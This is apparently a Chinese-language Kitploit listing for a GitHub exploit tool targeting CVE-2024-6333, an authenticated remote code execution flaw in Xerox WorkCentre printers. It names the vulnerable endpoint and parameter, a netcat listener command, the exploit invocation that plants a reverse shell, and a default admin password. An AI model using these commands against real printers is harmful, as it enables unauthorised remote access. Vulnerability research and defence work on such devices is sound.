Skip to content
KitploitKITPLOIT
工具博客
提交
工具博客
提交

黑客、渗透测试和网络安全工具,武装您的安全武器库!

Kitploit 是一个黑客、网络安全和渗透测试工具的目录。发现最新的项目更新,查找漏洞、分析系统、自动化测试并加强你的安全。

··订阅源·联系·隐私·© 2026 Kitploit

工具目录

分类

查看所有分类
Loading categories
工具/GitHubGitHub/0xqrx/cve-2024-6333
嵌入式系统安全漏洞利用Web应用程序漏洞利用渗透测试硬件与物联网安全
GitHub0xqrx/cve-2024-6333

CVE-2024-6333

Xerox WorkCentre 打印机中通过网络故障排除日志功能存在的经过身份验证的远程代码执行漏洞。

查看仓库
77个月前尚未审核

最受欢迎

查看全部 →

发现我们社区最常用的工具。

探索所有工具

浏览我们的工具集合

查看所有工具 →
分享

CVE-2024-6333 - 施乐(Xerox)认证远程代码执行

施乐 WorkCentre 打印机通过网络故障排查日志功能存在认证远程代码执行漏洞。

描述

网络故障排查日志功能(/properties/security/network_troubleshooting_log.php)未能对目标服务器参数(security.nwtroubleshoot.destination.server)进行清理,导致认证管理员可以注入任意操作系统命令。当网络日志捕获启动时,注入的载荷会作为 shell 命令执行,从而实现远程代码执行。

受影响产品

  • 施乐 WorkCentre 6655(已在固件 073.110.019.14200 上测试)
  • 其他多款施乐打印机型号(参见安全公告)

参考

  • https://sec-consult.com/vulnerability-lab/advisory/authenticated-remote-code-execution-in-multiple-xerox-printers/
  • https://nvd.nist.gov/vuln/detail/CVE-2024-6333

环境要求

  • Python 3
  • 目标打印机上有效的管理员凭据
  • 可访问目标的网络

安装

root@kitploit:~
pip install -r requirements.txt

使用方法

在您的机器上启动监听器:

root@kitploit:~
nc -lvnp 8443

运行漏洞利用程序:

root@kitploit:~
python3 CVE-2024-6333.py --target https://<PRINTER_IP> --lhost <YOUR_IP> --lport 8443

参数

工作原理

  1. 使用提供的凭据对打印机的 Web 界面进行身份验证
  2. 停止任何现有的网络故障排查日志会话
  3. 将反向 shell 载荷注入目标服务器字段
  4. 触发网络日志捕获,执行载荷
  5. 等待 30 秒,然后发送清理/停止命令

免责声明

本工具仅用于授权安全测试和教育目的。未经授权访问计算机系统属于违法行为。

下载工具
参数是否必需默认值说明
--target是目标 URL(例如 https://192.0.2.1)
--lhost是监听器 IP 地址
--lport否8443监听器端口
--user否admin管理员用户名
--password否1111管理员密码
--proxy否代理 URL(例如 http://127.0.0.1:8080)